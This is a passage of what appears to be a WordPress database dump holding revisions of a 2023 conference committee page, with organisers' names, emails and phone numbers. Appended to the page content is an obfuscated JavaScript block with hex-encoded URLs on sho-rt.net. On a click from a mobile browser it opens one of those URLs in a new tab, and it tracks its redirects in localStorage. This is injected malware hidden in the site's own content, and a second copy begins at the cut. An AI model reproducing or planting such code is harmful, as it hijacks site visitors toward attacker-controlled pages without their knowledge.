!important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\r\nDirector of Events and conferences Department<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\r\nLocal financial Director, GSW2023, Egypt<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-28 10:20:27','2023-06-28 10:20:27','',4849,'https://gsw2023.com/?p=4960',0,'revision','',0),
(4961,4,'2023-06-29 10:09:00','2023-06-29 10:09:00','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033328929{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 